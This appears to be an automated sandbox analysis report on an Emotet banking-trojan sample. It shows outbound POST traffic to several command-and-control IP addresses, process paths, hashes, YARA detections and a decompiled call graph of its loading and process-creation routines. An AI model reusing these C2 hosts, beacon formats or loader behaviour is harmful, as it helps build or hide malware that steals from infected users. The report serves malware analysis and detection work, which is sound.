                                                                6192.168.2.649745103.86.49.118080424C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Aug 20, 2024 19:11:10.167423010 CEST582OUTPOST /9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 103.86.49.11/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=---------------------55np6X3FuJzN6N0jwc7TN
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 103.86.49.11:8080
                                                                Content-Length: 4612
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.64974774.214.230.20080424C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Aug 20, 2024 19:11:35.085169077 CEST598OUTPOST /LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 74.214.230.200/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=---------------08lfRHAZEMwmT24
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 74.214.230.200
                                                                Content-Length: 4612
                                                                Cache-Control: no-cache
                                                                Aug 20, 2024 19:11:35.085203886 CEST4612OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 38 6c 66 52 48 41 5a 45 4d 77 6d 54 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 78 70 74 79 75 6e 6e 63
                                                                Data Ascii: -----------------08lfRHAZEMwmT24Content-Disposition: form-data; name="xptyunncwtcez"; filename="qkba"Content-Type: application/octet-stream*@nHPV@fn9_,E>)]*uEk& ]zkQ!%aD0B*Rf


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.649749194.187.133.160443424C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Aug 20, 2024 19:11:59.081681013 CEST632OUTPOST /67tfsWS9hNw/KKtRVVGv4EtXppzG6kI/QUenxzCNc1M41S/3mazKpx2CkV0/iq7lqvPWFwbXzrG/URwQPsLPEtkyUnGKT/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 194.187.133.160/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=---------------ZhnuNfjLptUX6mp
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 194.187.133.160:443
                                                                Content-Length: 4596
                                                                Cache-Control: no-cache


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:13:09:55
                                                                Start date:20/08/2024
                                                                Path:C:\Users\user\Desktop\ExeFile (233).exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\ExeFile (233).exe"
                                                                Imagebase:0x400000
                                                                File size:471'040 bytes
                                                                MD5 hash:59287B19F7D85E749D19A57337103045
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2113874721.00000000021F4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2113874721.00000000021F4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:13:09:55
                                                                Start date:20/08/2024
                                                                Path:C:\Windows\SysWOW64\rtmpal\dfscli.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\rtmpal\dfscli.exe"
                                                                Imagebase:0x400000
                                                                File size:471'040 bytes
                                                                MD5 hash:59287B19F7D85E749D19A57337103045
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.2117499906.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.2117499906.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:13:09:56
                                                                Start date:20/08/2024
                                                                Path:C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\KBDTZM\mibincodec.exe"
                                                                Imagebase:0x400000
                                                                File size:471'040 bytes
                                                                MD5 hash:59287B19F7D85E749D19A57337103045
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:false

                                                                General

                                                                Target ID:7
                                                                Start time:13:10:41
                                                                Start date:20/08/2024
                                                                Path:C:\Windows\System32\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                Imagebase:0x7ff7403e0000
                                                                File size:55'320 bytes
                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:2.9%
                                                                  Dynamic/Decrypted Code Coverage:51.6%
                                                                  Signature Coverage:25.4%
                                                                  Total number of Nodes:562
                                                                  Total number of Limit Nodes:75
                                                                  execution_graph 36076 4254c2 8 API calls 36077 402530 LoadLibraryA GetProcAddress EncryptFileA 36078 40257b 36077->36078 36133 4029de 36077->36133 36134 401d60 36078->36134 36080 4025d6 36081 401d60 ctype 35 API calls 36080->36081 36082 402605 36081->36082 36083 401d60 ctype 35 API calls 36082->36083 36084 402635 36083->36084 36144 402490 36084->36144 36086 402657 36087 402490 35 API calls 36086->36087 36088 402675 36087->36088 36089 401d60 ctype 35 API calls 36088->36089 36090 4026c2 36089->36090 36091 401d60 ctype 35 API calls 36090->36091 36092 4026f2 36091->36092 36093 401d60 ctype 35 API calls 36092->36093 36094 402722 36093->36094 36095 402490 35 API calls 36094->36095 36096 402741 36095->36096 36097 402490 35 API calls 36096->36097 36098 40275f 36097->36098 36099 401d60 ctype 35 API calls 36098->36099 36100 4027a5 36099->36100 36101 401d60 ctype 35 API calls 36100->36101 36102 4027d5 36101->36102 36103 401d60 ctype 35 API calls 36102->36103 36104 4027ff 36103->36104 36105 402490 35 API calls 36104->36105 36106 40281e 36105->36106 36107 402490 35 API calls 36106->36107 36108 402839 36107->36108 36109 401d60 ctype 35 API calls 36108->36109 36110 40288b 36109->36110 36111 401d60 ctype 35 API calls 36110->36111 36112 4028bb 36111->36112 36113 402490 35 API calls 36112->36113 36114 4028e0 LoadLibraryA GetProcAddress 36113->36114 36115 402915 36114->36115 36116 40291c GetProcAddress LdrFindResource_U 36114->36116 36115->36116 36117 402967 VirtualAlloc 36116->36117 36118 40294a LdrAccessResource 36116->36118 36151 401190 36117->36151 36118->36117 36120 4029aa 36154 401e50 36120->36154 36122 4029c1 36161 42c68a 66 API calls 3 library calls 36122->36161 36124 4029cc 36125 4029d4 36124->36125 36126 402c5f 36124->36126 36162 4270cc 70 API calls 2 library calls 36125->36162 36163 404ad1 30 API calls ctype 36126->36163 36129 402c65 36164 403b40 65 API calls ctype 36129->36164 36131 402c75 36165 4015d0 65 API calls ctype 36131->36165 36137 401d6d 36134->36137 36135 401db1 36136 401dc2 36135->36136 36180 41bf10 35 API calls 2 library calls 36135->36180 36141 401dd5 36136->36141 36181 401470 34 API calls ctype 36136->36181 36137->36135 36140 401d94 36137->36140 36166 401c70 36140->36166 36141->36080 36143 401dab 36143->36080 36145 401c70 ctype 35 API calls 36144->36145 36146 4024d1 36145->36146 36187 401a60 36146->36187 36149 401c70 ctype 35 API calls 36150 402502 36149->36150 36150->36086 36201 40de64 36151->36201 36153 40119a 36153->36120 36153->36153 36155 4023dd 36154->36155 36157 401e71 36154->36157 36155->36122 36156 41bc0c 35 API calls 36156->36157 36157->36156 36158 401b50 49 API calls 36157->36158 36159 401850 37 API calls 36157->36159 36160 4023c4 36157->36160 36158->36157 36159->36157 36160->36122 36161->36124 36162->36133 36163->36129 36164->36131 36165->36133 36167 401c83 36166->36167 36168 401c88 36166->36168 36182 41be75 35 API calls 2 library calls 36167->36182 36170 401cba 36168->36170 36171 401c9b 36168->36171 36173 401cc6 36170->36173 36185 41bf10 35 API calls 2 library calls 36170->36185 36183 4013f0 35 API calls 2 library calls 36171->36183 36177 401cd9 36173->36177 36186 401470 34 API calls ctype 36173->36186 36174 401ca7 36184 4013f0 35 API calls 2 library calls 36174->36184 36177->36143 36179 401cb1 36179->36143 36180->36136 36181->36141 36183->36174 36184->36179 36185->36173 36186->36177 36188 401a72 36187->36188 36189 401a77 36187->36189 36197 41be75 35 API calls 2 library calls 36188->36197 36191 401a99 36189->36191 36198 41bf10 35 API calls 2 library calls 36189->36198 36193 401ab3 36191->36193 36196 401ac6 36191->36196 36199 41bf10 35 API calls 2 library calls 36191->36199 36193->36196 36200 401470 34 API calls ctype 36193->36200 36196->36149 36198->36191 36199->36193 36200->36196 36204 40de38 36201->36204 36205 40de61 36204->36205 36207 40de3f __getbuf 36204->36207 36205->36153 36207->36205 36208 40ddbd 36207->36208 36210 40ddc9 ctype 36208->36210 36209 40ddfc 36212 40de17 RtlAllocateHeap 36209->36212 36214 40de26 ctype 36209->36214 36210->36209 36218 4108e8 34 API calls __lock 36210->36218 36212->36214 36213 40dde4 36219 4111ab 5 API calls _TranslateName 36213->36219 36214->36207 36216 40ddef 36220 40de2f LeaveCriticalSection __lock 36216->36220 36218->36213 36219->36216 36220->36209 36221 40e812 36222 40e81e _fast_error_exit ctype 36221->36222 36223 40e82a GetVersionExA 36222->36223 36224 40e872 GetModuleHandleA 36223->36224 36225 40e866 36223->36225 36226 40e88e 36224->36226 36225->36224 36273 410933 HeapCreate 36226->36273 36228 40e8e0 36229 40e8ec 36228->36229 36296 40e7ee 34 API calls _fast_error_exit 36228->36296 36297 411f5d 42 API calls _TranslateName 36229->36297 36232 40e8f2 36233 40e8f6 36232->36233 36234 40e8fe 36232->36234 36298 40e7ee 34 API calls _fast_error_exit 36233->36298 36281 412b89 39 API calls 2 library calls 36234->36281 36236 40e8fd 36236->36234 36238 40e90b 36239 40e917 GetCommandLineA 36238->36239 36240 40e90f 36238->36240 36282 412a67 42 API calls 3 library calls 36239->36282 36299 40e7c9 34 API calls _fast_error_exit 36240->36299 36243 40e916 36243->36239 36244 40e927 36300 4129c5 64 API calls 2 library calls 36244->36300 36246 40e931 36247 40e935 36246->36247 36248 40e93d 36246->36248 36301 40e7c9 34 API calls _fast_error_exit 36247->36301 36283 412792 63 API calls 5 library calls 36248->36283 36251 40e942 36253 40e946 36251->36253 36254 40e94e 36251->36254 36252 40e93c 36252->36248 36302 40e7c9 34 API calls _fast_error_exit 36253->36302 36284 40efc5 38 API calls 36254->36284 36257 40e94d 36257->36254 36258 40e955 36259 40e964 GetStartupInfoA 36258->36259 36260 40e95d 36258->36260 36285 412735 63 API calls 2 library calls 36259->36285 36303 40e7c9 34 API calls _fast_error_exit 36260->36303 36263 40e963 36263->36259 36264 40e976 36265 40e97f 36264->36265 36266 40e988 GetModuleHandleA 36265->36266 36286 41de27 36266->36286 36269 40e9a6 36305 40f114 34 API calls _fast_error_exit 36269->36305 36272 40e9ab ctype 36274 410953 36273->36274 36275 41097d 36273->36275 36276 410980 36274->36276 36277 410962 36274->36277 36275->36228 36276->36228 36306 410984 HeapAlloc 36277->36306 36279 41096c 36279->36276 36280 410971 HeapDestroy 36279->36280 36280->36275 36281->36238 36282->36244 36283->36251 36284->36258 36285->36264 36287 425bbd 36286->36287 36307 41f394 30 API calls ctype 36287->36307 36289 425bc8 36308 4295d4 36289->36308 36294 40e996 36294->36269 36304 40f0f2 34 API calls _fast_error_exit 36294->36304 36296->36229 36297->36232 36298->36236 36299->36243 36300->36246 36301->36252 36302->36257 36303->36263 36304->36269 36305->36272 36306->36279 36307->36289 36327 429ca6 36308->36327 36311 425bcf 36313 42a282 SetErrorMode SetErrorMode 36311->36313 36314 4295d4 ctype 30 API calls 36313->36314 36315 42a29a 36314->36315 36316 4295d4 ctype 30 API calls 36315->36316 36317 42a2a9 36316->36317 36318 42a2c8 36317->36318 36358 42a134 36317->36358 36320 4295d4 ctype 30 API calls 36318->36320 36321 42a2cd 36320->36321 36322 42a2d9 36321->36322 36386 41f835 36321->36386 36324 42a2e8 GetProcAddress 36322->36324 36325 425be7 36322->36325 36324->36325 36326 42c88c 67 API calls ctype 36325->36326 36326->36294 36328 429cb0 __EH_prolog 36327->36328 36335 429cd5 36328->36335 36336 429ce6 36328->36336 36339 4299f1 TlsAlloc 36328->36339 36330 429cf5 36333 429cfb 36330->36333 36334 4295e3 36330->36334 36357 429a96 9 API calls 2 library calls 36333->36357 36334->36311 36338 429916 6 API calls 2 library calls 36334->36338 36342 4297aa EnterCriticalSection 36335->36342 36352 4298b6 EnterCriticalSection 36336->36352 36338->36311 36340 429a20 36339->36340 36341 429a25 InitializeCriticalSection 36339->36341 36340->36341 36341->36335 36345 4297cb 36342->36345 36343 429880 _TranslateName 36344 429897 LeaveCriticalSection 36343->36344 36344->36336 36345->36343 36346 429814 GlobalHandle GlobalUnlock GlobalReAlloc 36345->36346 36347 429804 GlobalAlloc 36345->36347 36348 429839 36346->36348 36347->36348 36349 429860 GlobalLock 36348->36349 36350 429852 LeaveCriticalSection 36348->36350 36351 429844 GlobalHandle GlobalLock 36348->36351 36349->36343 36350->36349 36351->36350 36353 4298cd 36352->36353 36356 4298de LeaveCriticalSection 36352->36356 36354 4298d2 TlsGetValue 36353->36354 36353->36356 36354->36356 36356->36330 36357->36334 36359 4295d4 ctype 30 API calls 36358->36359 36360 42a157 GetModuleFileNameA 36359->36360 36361 42a17f 36360->36361 36363 42a188 PathFindExtensionA 36361->36363 36401 425d8a RaiseException ctype 36361->36401 36364 42a1a1 36363->36364 36365 42a19c 36363->36365 36392 42a105 PathFindFileNameA lstrlenA lstrcpynA 36364->36392 36402 425d8a RaiseException ctype 36365->36402 36368 42a1bb 36369 42a1c4 36368->36369 36403 425d8a RaiseException ctype 36368->36403 36371 42a1d7 36369->36371 36404 40f132 34 API calls 3 library calls 36369->36404 36373 42a205 36371->36373 36393 42453c 36371->36393 36374 42a245 36373->36374 36380 42a226 lstrcpyA 36373->36380 36377 42a24a lstrcatA 36374->36377 36378 42a268 36374->36378 36407 40f132 34 API calls 3 library calls 36377->36407 36408 40e9e7 34 API calls 2 library calls 36378->36408 36406 40f132 34 API calls 3 library calls 36380->36406 36382 42a27a 36382->36318 36385 42a23b 36385->36374 36387 4295d4 ctype 30 API calls 36386->36387 36388 41f83a 36387->36388 36389 41f862 36388->36389 36415 4295c4 36388->36415 36389->36322 36392->36368 36394 424548 36393->36394 36399 424560 36393->36399 36395 4295d4 ctype 30 API calls 36394->36395 36396 42454d 36395->36396 36409 403250 FindResourceA 36396->36409 36398 42455a 36398->36399 36400 424566 WideCharToMultiByte 36398->36400 36405 40f132 34 API calls 3 library calls 36399->36405 36400->36399 36404->36371 36405->36373 36406->36385 36407->36378 36408->36382 36410 403271 36409->36410 36411 403274 36409->36411 36410->36398 36414 4031f0 LoadResource LockResource SizeofResource 36411->36414 36413 40327c 36413->36398 36414->36413 36416 429ca6 ctype 24 API calls 36415->36416 36417 41f846 GetCurrentThreadId SetWindowsHookExA 36416->36417 36417->36389 36418 2264ba0 36419 2264bb2 36418->36419 36421 2264bc8 36418->36421 36440 2263f20 GetPEB 36419->36440 36423 2264c07 CreateProcessW 36421->36423 36442 2263f20 GetPEB 36421->36442 36422 2264bbc 36441 2263e80 GetPEB 36422->36441 36426 2264c27 36423->36426 36427 2264ca3 36423->36427 36429 2264c2f 36426->36429 36431 2264c63 36426->36431 36444 2263f20 GetPEB 36426->36444 36428 2264bf6 36443 2263e80 GetPEB 36428->36443 36435 2264c8d 36431->36435 36446 2263f20 GetPEB 36431->36446 36432 2264c02 36432->36423 36434 2264c57 36445 2263e80 GetPEB 36434->36445 36438 2264c81 36447 2263e80 GetPEB 36438->36447 36440->36422 36441->36421 36442->36428 36443->36432 36444->36434 36445->36431 36446->36438 36447->36435 36448 2265ca0 36456 2266530 36448->36456 36450 2265ca5 36451 2265cc9 ExitProcess 36450->36451 36498 2263f20 GetPEB 36450->36498 36453 2265cb8 36499 2263e80 GetPEB 36453->36499 36455 2265cc4 36455->36451 36497 2266551 36456->36497 36457 2266ee9 36573 226b160 GetPEB 36457->36573 36460 2266eee 36460->36450 36461 2266f03 36575 2268590 GetPEB 36461->36575 36465 22669c9 36465->36450 36467 2266ef6 36574 2268ba0 GetPEB CreateProcessW 36467->36574 36468 2264250 GetPEB 36468->36497 36481 2266efb 36481->36450 36489 2263e80 GetPEB 36489->36497 36490 2263f20 GetPEB 36490->36497 36495 2264190 GetPEB 36495->36497 36497->36457 36497->36461 36497->36465 36497->36467 36497->36468 36497->36489 36497->36490 36497->36495 36500 2268240 36497->36500 36506 2267ec0 36497->36506 36519 2266fb0 36497->36519 36540 2268a10 36497->36540 36550 226b050 GetPEB 36497->36550 36551 22660e0 GetPEB 36497->36551 36552 2269d70 GetPEB 36497->36552 36553 226b2b0 GetPEB GetCurrentProcessId CreateProcessW 36497->36553 36554 22696b0 FindNextFileW FindFirstFileW FindClose GetPEB RtlAllocateHeap 36497->36554 36555 22690c0 GetPEB 36497->36555 36556 2269470 GetPEB 36497->36556 36557 2268550 GetPEB 36497->36557 36558 2268ea0 GetPEB 36497->36558 36559 2265f60 GetPEB 36497->36559 36560 2265360 GetPEB 36497->36560 36561 22687d0 GetPEB RtlAllocateHeap 36497->36561 36562 22647a0 GetPEB GetCurrentProcessId 36497->36562 36563 2269ea0 GetPEB 36497->36563 36564 2269320 GetPEB 36497->36564 36565 2267160 GetPEB 36497->36565 36566 22612b0 _snwprintf GetPEB RtlAllocateHeap 36497->36566 36567 22672a0 GetPEB 36497->36567 36568 2263310 GetPEB 36497->36568 36569 2261890 GetPEB RtlAllocateHeap 36497->36569 36570 2263460 GetPEB 36497->36570 36571 2268cd0 GetPEB 36497->36571 36572 226ae60 GetPEB 36497->36572 36498->36453 36499->36455 36505 2268332 36500->36505 36501 22684b8 36501->36497 36502 2263f20 GetPEB 36502->36505 36503 226838c CreateFileW 36503->36501 36503->36505 36504 2263e80 GetPEB 36504->36505 36505->36501 36505->36502 36505->36503 36505->36504 36517 2267f94 36506->36517 36508 22681d0 CreateFileW 36510 226821f 36508->36510 36508->36517 36509 2268200 36509->36510 36586 2263f20 GetPEB 36509->36586 36510->36497 36511 226813f SetFileInformationByHandle 36511->36517 36512 2268166 36512->36497 36514 2268213 36587 2263e80 GetPEB 36514->36587 36516 2263f20 GetPEB 36516->36517 36517->36508 36517->36509 36517->36511 36517->36512 36517->36516 36518 2263e80 GetPEB 36517->36518 36576 22634c0 36517->36576 36518->36517 36523 2266fb5 36519->36523 36520 22670bf 36522 22634c0 GetPEB 36520->36522 36521 22670be 36521->36497 36524 22670cb 36522->36524 36523->36520 36523->36521 36526 2266f10 GetPEB LoadLibraryW 36523->36526 36525 22670f1 LoadLibraryW 36524->36525 36592 2263f20 GetPEB 36524->36592 36528 2267106 36525->36528 36531 226711c 36525->36531 36526->36523 36594 2263f20 GetPEB 36528->36594 36529 22670e0 36593 2263e80 GetPEB 36529->36593 36535 2267144 36531->36535 36596 2263f20 GetPEB 36531->36596 36533 2267110 36595 2263e80 GetPEB 36533->36595 36535->36497 36536 22670ec 36536->36525 36538 2267138 36597 2263e80 GetPEB 36538->36597 36547 2268a24 36540->36547 36542 2268b8a 36624 22636b0 36542->36624 36544 2268b3e 36544->36497 36545 2268b93 36545->36497 36546 22634c0 GetPEB 36546->36547 36547->36542 36547->36544 36547->36546 36548 2263e80 GetPEB 36547->36548 36549 2263f20 GetPEB 36547->36549 36598 2263780 36547->36598 36548->36547 36549->36547 36550->36497 36551->36497 36552->36497 36553->36497 36554->36497 36555->36497 36556->36497 36557->36497 36558->36497 36559->36497 36560->36497 36561->36497 36562->36497 36563->36497 36564->36497 36565->36497 36566->36497 36567->36497 36568->36497 36569->36497 36570->36497 36571->36497 36572->36497 36573->36460 36574->36481 36575->36465 36577 22634e3 36576->36577 36578 2263508 36577->36578 36588 2263f20 GetPEB 36577->36588 36585 2263530 36578->36585 36590 2263f20 GetPEB 36578->36590 36580 22634fc 36589 2263e80 GetPEB 36580->36589 36583 2263524 36591 2263e80 GetPEB 36583->36591 36585->36517 36586->36514 36587->36510 36588->36580 36589->36578 36590->36583 36591->36585 36592->36529 36593->36536 36594->36533 36595->36531 36596->36538 36597->36535 36599 2263795 36598->36599 36600 22637ab 36598->36600 36644 2263f20 GetPEB 36599->36644 36604 22637dd 36600->36604 36646 2263f20 GetPEB 36600->36646 36602 226379f 36645 2263e80 GetPEB 36602->36645 36608 2263812 36604->36608 36648 2263f20 GetPEB 36604->36648 36606 22637d1 36647 2263e80 GetPEB 36606->36647 36615 226384a 36608->36615 36650 2263f20 GetPEB 36608->36650 36610 2263806 36649 2263e80 GetPEB 36610->36649 36613 226383e 36651 2263e80 GetPEB 36613->36651 36618 2263876 36615->36618 36652 2263f20 GetPEB 36615->36652 36617 226386a 36653 2263e80 GetPEB 36617->36653 36620 22638cc 36618->36620 36654 2263f20 GetPEB 36618->36654 36620->36547 36622 22638c0 36655 2263e80 GetPEB 36622->36655 36625 22634c0 GetPEB 36624->36625 36626 22636c4 36625->36626 36627 22636e5 36626->36627 36656 2263f20 GetPEB 36626->36656 36630 226371a 36627->36630 36658 2263f20 GetPEB 36627->36658 36629 22636d9 36657 2263e80 GetPEB 36629->36657 36640 2263742 36630->36640 36660 2263f20 GetPEB 36630->36660 36633 226370e 36659 2263e80 GetPEB 36633->36659 36636 2263736 36661 2263e80 GetPEB 36636->36661 36637 2263773 DeleteFileW 36637->36545 36640->36637 36662 2263f20 GetPEB 36640->36662 36641 2263762 36663 2263e80 GetPEB 36641->36663 36643 226376e 36643->36637 36644->36602 36645->36600 36646->36606 36647->36604 36648->36610 36649->36608 36650->36613 36651->36615 36652->36617 36653->36618 36654->36622 36655->36620 36656->36629 36657->36627 36658->36633 36659->36630 36660->36636 36661->36640 36662->36641 36663->36643 36664 22630d0 36665 22630ea 36664->36665 36666 22632b5 36665->36666 36668 22631df 36665->36668 36669 2263f20 GetPEB 36665->36669 36672 226317a RtlAllocateHeap 36665->36672 36673 2263e80 GetPEB 36665->36673 36666->36668 36674 2263f20 GetPEB 36666->36674 36669->36665 36670 22632c9 36675 2263e80 GetPEB 36670->36675 36672->36665 36672->36668 36673->36665 36674->36670 36675->36668 36676 21c0000 36678 21c0005 36676->36678 36681 21c002d 36678->36681 36701 21c0456 GetPEB 36681->36701 36684 21c0456 GetPEB 36685 21c0053 36684->36685 36686 21c0456 GetPEB 36685->36686 36687 21c0061 36686->36687 36688 21c0456 GetPEB 36687->36688 36689 21c006d 36688->36689 36690 21c0456 GetPEB 36689->36690 36691 21c007b 36690->36691 36692 21c0456 GetPEB 36691->36692 36695 21c0089 36692->36695 36693 21c00e4 GetNativeSystemInfo 36694 21c0107 VirtualAlloc 36693->36694 36699 21c0029 36693->36699 36697 21c012f 36694->36697 36695->36693 36695->36699 36696 21c03b2 36703 21f27b0 36696->36703 36697->36696 36698 21c0388 VirtualProtect 36697->36698 36698->36697 36698->36699 36702 21c0045 36701->36702 36702->36684 36706 21f1000 36703->36706 36709 21f1030 LoadLibraryW GetProcAddress 36706->36709 36750 21f1b30 36709->36750 36712 21f10a3 36714 21f1b30 SetLastError 36712->36714 36713 21f1091 SetLastError 36746 21f102b ExitProcess 36713->36746 36715 21f10b9 36714->36715 36716 21f10de SetLastError 36715->36716 36717 21f10f0 36715->36717 36715->36746 36716->36746 36718 21f10ff SetLastError 36717->36718 36719 21f1111 36717->36719 36718->36746 36720 21f111c SetLastError 36719->36720 36722 21f112e GetNativeSystemInfo 36719->36722 36720->36746 36723 21f11bc 36722->36723 36724 21f11e9 36723->36724 36725 21f11d7 SetLastError 36723->36725 36753 21f1800 VirtualAlloc 36724->36753 36725->36746 36726 21f1202 36727 21f123d GetProcessHeap RtlAllocateHeap 36726->36727 36754 21f1800 VirtualAlloc 36726->36754 36728 21f127b 36727->36728 36729 21f1257 SetLastError 36727->36729 36733 21f1b30 SetLastError 36728->36733 36729->36746 36730 21f1222 36730->36727 36731 21f122e SetLastError 36730->36731 36731->36746 36734 21f12fb 36733->36734 36735 21f1302 36734->36735 36755 21f1800 VirtualAlloc 36734->36755 36781 21f16c0 GetProcessHeap HeapFree VirtualFree 36735->36781 36736 21f1320 36756 21f1b50 36736->36756 36739 21f136b 36739->36735 36762 21f21a0 36739->36762 36743 21f13ca 36743->36735 36744 21f13eb 36743->36744 36745 21f13ff GetPEB 36744->36745 36744->36746 36745->36746 36751 21f1b3b SetLastError 36750->36751 36752 21f1070 36750->36752 36751->36752 36752->36712 36752->36713 36752->36746 36753->36726 36754->36730 36755->36736 36759 21f1b7d 36756->36759 36757 21f1b30 SetLastError 36758 21f1c32 36757->36758 36760 21f1be9 36758->36760 36782 21f1800 VirtualAlloc 36758->36782 36759->36757 36759->36760 36760->36739 36763 21f21dd IsBadHugeReadPtr 36762->36763 36772 21f13b5 36762->36772 36765 21f2207 